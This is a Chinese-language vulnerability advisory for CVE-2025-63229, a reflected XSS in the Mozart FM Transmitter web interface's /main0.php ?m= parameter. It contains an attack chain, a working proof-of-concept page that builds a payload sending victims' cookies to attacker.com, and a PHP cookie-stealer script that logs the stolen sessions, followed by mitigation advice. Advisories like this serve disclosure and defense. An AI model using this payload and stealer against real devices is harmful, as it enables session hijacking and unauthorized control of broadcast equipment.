CVE-2025-63229 | Mozart FM Transmitter 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-63229

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Mozart FM Transmitter (WEBMOZZI-00287)

漏洞概述

CVE-2025-63229是Mozart FM Transmitter网络管理界面中存在的一个反射型跨站脚本(XSS)漏洞。该设备型号为WEBMOZZI-00287，是一款专业的FM广播发射设备。其Web管理界面在处理用户输入时，未对?m=查询参数进行充分的输入验证和输出编码。攻击者可以通过构造恶意的JavaScript脚本，并将其作为参数值注入到URL中。当受害者点击包含恶意载荷的链接访问受影响的页面时，浏览器会执行注入的恶意代码。此漏洞可能导致多种安全风险，包括但不限于：窃取用户会话Cookie从而劫持会话、获取用户输入的敏感信息（如管理员凭据）、在用户不知情的情况下执行未经授权的操作、植入钓鱼页面或恶意重定向等。由于该设备通常用于广播电台的日常运营管理，攻击者可能利用此漏洞干扰正常的广播传输或获取对广播系统的控制权限。

技术细节

漏洞位于Mozart FM Transmitter的Web管理界面/main0.php端点。该端点直接使用GET参数m的值并将其反映在返回的HTML页面中，而未进行任何输入验证或输出编码。具体攻击过程如下：攻击者构造包含恶意JavaScript payload的URL，格式为http://[target]/main0.php?m=<script>alert(document.cookie)</script>。当用户访问该URL时，服务器将参数值直接嵌入到响应页面中，浏览器将其解析为可执行的JavaScript代码并执行。反射型XSS的特点是恶意脚本不存储在服务器端，而是通过URL参数传递，因此也称为非持久性XSS。攻击者通常通过钓鱼邮件、社交工程或恶意链接传播这种攻击。由于该漏洞不需要认证即可利用（PR:N），且可通过网络远程发起（AV:N），攻击门槛相对较低。受害者在登录管理面板的情况下访问恶意链接，攻击者即可获取其认证会话，实现对广播设备的未授权操作。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Mozart FM Transmitter设备（WEBMOZZI-00287），确定其Web管理界面的IP地址或域名

STEP 2

步骤2

载荷构造：攻击者构造恶意JavaScript payload，如<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

STEP 3

步骤3

链接生成：将恶意payload编码后注入到/main0.php?m=参数中，生成钓鱼链接

STEP 4

步骤4

社工传播：攻击者通过钓鱼邮件、即时通讯或其他渠道诱骗目标用户点击恶意链接

STEP 5

步骤5

漏洞触发：用户访问恶意URL后，服务器将未过滤的参数值反射回HTML页面

STEP 6

步骤6

代码执行：用户浏览器解析响应时将恶意脚本作为合法JavaScript执行

STEP 7

步骤7

会话窃取：恶意脚本将用户Cookie等敏感信息发送到攻击者控制的服务器

STEP 8

步骤8

会话劫持：攻击者使用窃取的Cookie伪装成合法用户登录管理面板，执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-63229 PoC - Mozart FM Transmitter Reflected XSS -->
<!-- Target: Mozart FM Transmitter WEBMOZZI-00287 -->
<!-- Endpoint: /main0.php -->
<!-- Attack Vector: ?m= parameter -->

<!-- Basic XSS PoC - Cookie Theft -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-63229 PoC</title>
</head>
<body>
    <h2>CVE-2025-63229 - Mozart FM Transmitter XSS</h2>
    
    <!-- Malicious URL -->
    <p>Attack URL:</p>
    <code id="maliciousUrl"></code>
    
    <script>
        // Generate malicious URL
        var targetHost = prompt("Enter target host (e.g., http://192.168.1.100):", "http://192.168.1.100");
        var maliciousPayload = '<script>document.location="http://attacker.com/steal?c='+encodeURIComponent(document.cookie)+'"</script>';
        var maliciousUrl = targetHost + '/main0.php?m=' + encodeURIComponent(maliciousPayload);
        document.getElementById('maliciousUrl').innerText = maliciousUrl;
        
        // Display link for testing
        document.write('<br><a href="' + maliciousUrl + '" target="_blank">Click to test (simulated)</a>');
    </script>
    
    <!-- Simulated Attack Request -->
    <h3>Attack Request:</h3>
    <pre id="attackRequest"></pre>
    
    <script>
        // Show attack request format
        var requestText = 'GET /main0.php?m=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n' +
                         'Host: target-server\n' +
                         'User-Agent: Mozilla/5.0\n' +
                         'Accept: text/html\n';
        document.getElementById('attackRequest').innerText = requestText;
    </script>
    
    <!-- Stealer Script (attacker-controlled server) -->
    <h3>Cookie Stealer (steal.php):</h3>
    <pre>
<?php
if(isset($_GET['c'])) {
    $cookie = $_GET['c'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $date = date('Y-m-d H:i:s');
    
    // Log stolen cookie
    $log = fopen("cookies.txt", "a");
    fwrite($log, "IP: $ip | Date: $date | Cookie: $cookie\n");
    fclose($log);
    
    // Redirect to legitimate site
    header("Location: http://target/main0.php");
}
?>
    </pre>
    
</body>
</html>

影响范围

Mozart FM Transmitter WEBMOZZI-00287 (版本未知)

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，可采取以下临时缓解措施：1) 禁止公网访问Web管理界面，仅允许通过内网VPN或专用管理网络访问；2) 部署WAF(Web应用防火墙)规则，过滤包含<script>、javascript:等XSS特征字符的请求；3) 使用浏览器安全插件如NoScript限制JavaScript执行；4) 提醒管理员不要点击可疑链接，对可疑邮件保持警惕；5) 加强管理账户密码复杂度，使用双因素认证；6) 监控Web服务器日志，关注异常的请求模式。